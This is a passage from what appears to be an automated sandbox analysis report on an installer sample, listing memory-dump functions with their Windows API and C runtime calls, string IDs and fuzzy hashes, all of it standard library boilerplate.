                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: IJ$WIJ$J
                                        • API String ID: 3519838083-740443243
                                        • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction ID: 3d75961bfbc3dadb5d5bb7696bd7823ca9d2605f34140845fe26f0392871312f
                                        • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction Fuzzy Hash: F071AE30A04255DFDB04CF68C484BDDB7F0BF14308F1080AAD8656BB91CB75BA4ACB90
                                        APIs
                                        • _free.LIBCMT ref: 6C0E5ADD
                                        • _free.LIBCMT ref: 6C0E5B06
                                        • SetEndOfFile.KERNEL32(00000000,6C0E46EC,00000000,6C0DB0D0,?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000), ref: 6C0E5B38
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0E5B54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFileLast
                                        • String ID: 8Q
                                        • API String ID: 1547350101-4022487301
                                        • Opcode ID: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                        • Instruction ID: f9b46d84d014247ce8a0782a893b4207617b708860e57c09b5155c60f4872154
                                        • Opcode Fuzzy Hash: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                        • Instruction Fuzzy Hash: DB41CB3A640615AFDB019BB8CC81BCE37F5EF4D328F290951E424D7B90EB34E4458B61
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C11E41D
                                          • Part of subcall function 6C11EE40: __EH_prolog.LIBCMT ref: 6C11EE45
                                          • Part of subcall function 6C11E8EB: __EH_prolog.LIBCMT ref: 6C11E8F0
                                          • Part of subcall function 6C11E593: __EH_prolog.LIBCMT ref: 6C11E598
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: &qB$0aJ$A0$XqB
                                        • API String ID: 3519838083-1326096578
                                        • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction ID: 75037fd76694717641aeb8acc3d10ed11bbb21d6ba83c55f7acdb7e8ee61ca51
                                        • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction Fuzzy Hash: 3C21BB71D05258EACB04CBE4D984AECBBF4AF15318F20406AE82263B81DB781F4CCB60
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF13F
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0CF152
                                        • FreeLibrary.KERNEL32(00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF175
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                        • Instruction ID: 4db272fd0deddf028ff289affeeb73d8fa6864d18cb08b5b1976edd9c1d8df20
                                        • Opcode Fuzzy Hash: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                        • Instruction Fuzzy Hash: 6AF08C31601119FBDF02AB90DD19B9E7EF8EB0575AF211060FC15E2490CF708B40DA92
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0C732E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                          • Part of subcall function 6C0C7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0C7248
                                        • std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                        • _Yarn.LIBCPMT ref: 6C0C736A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                        • String ID:
                                        • API String ID: 1088826258-0
                                        • Opcode ID: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                        • Instruction ID: 45c59611db76ce213487bceedcd7eafaa054b97e7172e08b056eb38fe8350744
                                        • Opcode Fuzzy Hash: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                        • Instruction Fuzzy Hash: A701DFB57042149BCB06DF24C840BBC7BF1FF86254B15000AE81197780CF38AA56DBC6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $!$@
                                        • API String ID: 3519838083-2517134481
                                        • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction ID: 7f229535afa36cce14165ec9a3732901ce70c797baf8a42c3c4a534014c53327
                                        • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction Fuzzy Hash: 38125B74E06249DFCB04CFA4C590ADDBBB1BF09348F14C46AE845ABB51DB31E995CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog__aulldiv
                                        • String ID: $SJ
                                        • API String ID: 4125985754-3948962906
                                        • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction ID: 3640b816a64c778e459e0b17da178cc570629f12d8b194fb49ce1b374bca28a1
                                        • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction Fuzzy Hash: 92B15BB1E05209DFCB14CF99C884AAEBBB1FF59314B20853EE515A7B50D738AA45CF90
                                        APIs
                                          • Part of subcall function 6C0C7327: __EH_prolog3.LIBCMT ref: 6C0C732E
                                          • Part of subcall function 6C0C7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                          • Part of subcall function 6C0C7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                          • Part of subcall function 6C0C7327: _Yarn.LIBCPMT ref: 6C0C736A
                                          • Part of subcall function 6C0C7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                          • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                          • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                          • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                          • Part of subcall function 6BF92F60: __Getctype.LIBCPMT ref: 6BF93084
                                          • Part of subcall function 6BF92F60: std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                          • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                        • std::ios_base::_Addstd.LIBCPMT ref: 6BF9211B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 3332196525-1866435925
                                        • Opcode ID: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                        • Instruction ID: 86c2c66132a7525e9e06a299cd669b429aeca26d874329f1f5f3fbba819935b6
                                        • Opcode Fuzzy Hash: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                        • Instruction Fuzzy Hash: E54191B1A003099FEB00DF64D8457AEBBB1BF48314F108268E9159B391D776A985CF91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C124ECC
                                          • Part of subcall function 6C10F58A: __EH_prolog.LIBCMT ref: 6C10F58F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: :hJ$dJ$xJ
                                        • API String ID: 3519838083-2437443688
                                        • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction ID: 31d45960e8cc0bc9f8d5c9074e0e702c3de33e26657c986efcf2c70583619d77
                                        • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction Fuzzy Hash: 6521D8B0901B40CFC760CF6AC14428ABBF4BF2A708B10C95EC4AA97B11D7B8B649CF55
                                        APIs
                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C0DB0D0,6BF91DEA,00008000,6C0DB0D0,?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA), ref: 6C0DADC9
                                        • GetLastError.KERNEL32(?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA,?,6C0E469E,6C0DB0D0,000000FF,000000FF,00000002,00008000,6C0DB0D0), ref: 6C0DADD3
                                        • __dosmaperr.LIBCMT ref: 6C0DADDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 2336955059-4022487301
                                        • Opcode ID: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                        • Instruction ID: 9839841b224ce3d1d044373a70d650bbf980cc1c1144397b44380d4486d556d0
                                        • Opcode Fuzzy Hash: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                        • Instruction Fuzzy Hash: 90018D337146157FCF058FA9DC05A9E3BB9DB853257360205F812D7680EA71F9418BA1
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D49B7
                                        • _free.LIBCMT ref: 6C0D4A14
                                        • _free.LIBCMT ref: 6C0D4A4A
                                        • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D4A55
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast_free
                                        • String ID:
                                        • API String ID: 2283115069-0
                                        • Opcode ID: 36feddb1ca5eb3a8b9a3612ec61c52bb1cee638ac02395180bf28d21285f13bd
                                        • Instruction ID: 0840c9032f364b636c5857ac353a752ffac629f0fd6071c8746750d99ebf34b8
                                        • Opcode Fuzzy Hash: 36feddb1ca5eb3a8b9a3612ec61c52bb1cee638ac02395180bf28d21285f13bd
                                        • Instruction Fuzzy Hash: 9011C1723043007BAA005BF99C84FDE25E99BC237CB670628F524A7B80DF21B90A4628
                                        APIs
                                        • WriteConsoleW.KERNEL32(00000000,?,6C0E46EC,00000000,00000000,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0), ref: 6C0E5ED1
                                        • GetLastError.KERNEL32(?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?,6C0DB0D0,?,6C0DBD1C,6C0E5AB6), ref: 6C0E5EDD
                                          • Part of subcall function 6C0E5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C0E5EED,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?,6C0DB0D0), ref: 6C0E5F3E
                                        • ___initconout.LIBCMT ref: 6C0E5EED
                                          • Part of subcall function 6C0E5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C0E5EAB,6C0E4B3E,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?), ref: 6C0E5F22
                                        • WriteConsoleW.KERNEL32(00000000,?,6C0E46EC,00000000,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?), ref: 6C0E5F02
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                        • String ID:
                                        • API String ID: 2744216297-0
                                        • Opcode ID: 77f36f920391fd6fca10d0937369c50c9e36571f026525491620a35233cf00d1
                                        • Instruction ID: 3a092292e0814dd8109e052d59537bb9ba965594089d56de364d7481f404b288
                                        • Opcode Fuzzy Hash: 77f36f920391fd6fca10d0937369c50c9e36571f026525491620a35233cf00d1
                                        • Instruction Fuzzy Hash: 86F0C73A540125BFCF121FE5DC04AC93F76FF09765F094510FE1996560DB329960DB90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: 8Q
                                        • API String ID: 2427045233-4022487301
                                        • Opcode ID: 0f5e23da3342bf198f49f5004a60debbf9ef4aea01a3fa67cc9076ba5547ed36
                                        • Instruction ID: 112fa967ae7571fc308711b331e58333ee64c62c08bc92f90347605d9fef096b
                                        • Opcode Fuzzy Hash: 0f5e23da3342bf198f49f5004a60debbf9ef4aea01a3fa67cc9076ba5547ed36
                                        • Instruction Fuzzy Hash: 2071C274D093169BDB108B95C980BFEBBF5EF0D318F164229E92067A80DB71B845CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C118C5D
                                          • Part of subcall function 6C11761A: __EH_prolog.LIBCMT ref: 6C11761F
                                          • Part of subcall function 6C117A2E: __EH_prolog.LIBCMT ref: 6C117A33
                                          • Part of subcall function 6C118EA5: __EH_prolog.LIBCMT ref: 6C118EAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: WZJ
                                        • API String ID: 3519838083-1089469559
                                        • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                        • Instruction ID: 0c1250c1d5e52385b23fda9efe7a85b61b4a90926d8c62bf0f5dbfafea0f6eb1
                                        • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                        • Instruction Fuzzy Hash: FC818D31D04258DFDF15DFA8D490BDDB7B4AF19318F1080AAE91267B90DB346E49CBA0
                                        APIs
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 6BF92A76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ___std_exception_destroy
                                        • String ID: Jbx$Jbx
                                        • API String ID: 4194217158-1161259238
                                        • Opcode ID: e0501a24b684408b6f91fb14f8027b4a7d3f638d6392cc07c273d6d8bc72e6d7
                                        • Instruction ID: d6cbcd82296b15b790890add865d8f497c49dffb017dfcf949b34b46751c330c
                                        • Opcode Fuzzy Hash: e0501a24b684408b6f91fb14f8027b4a7d3f638d6392cc07c273d6d8bc72e6d7
                                        • Instruction Fuzzy Hash: 3D51F4B39002049FDB14DF68E8806EEBBF5EF89314F14846DE8499B351D336E985CB92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: CK$CK
                                        • API String ID: 3519838083-2096518401
                                        • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                        • Instruction ID: 380fd756cd8ce184b90e96a086dd631a377ac68389d6757f48753201ce9040c1
                                        • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                        • Instruction Fuzzy Hash: 35518D75A00309DFDB00CFA4C890BEEB3B5FF98359F158529D901EBA41DB74A9068BA0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C0E46D6), ref: 6C0DD01B
                                        • __dosmaperr.LIBCMT ref: 6C0DD022
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 1659562826-4022487301
                                        • Opcode ID: ea60a4e5d8e7aa5f2cab4f62e6394a9190369d06afa3a37f28196cb9061383fe
                                        • Instruction ID: a2795aa49771d67048e7e8a882c8340be3f69c5a4c5b7cbc69aa7345fe5bc995
                                        • Opcode Fuzzy Hash: ea60a4e5d8e7aa5f2cab4f62e6394a9190369d06afa3a37f28196cb9061383fe
                                        • Instruction Fuzzy Hash: 5C4197716043A4AFDB119F68C880BED7FE5EF46344F658258F8808B642D371BD06CB92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0|J$`)L
                                        • API String ID: 3519838083-117937767
                                        • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                        • Instruction ID: b520ec9eb6e84cac70288c7f75c9874d17536bdf8eef3e302402ddaca56d12d7
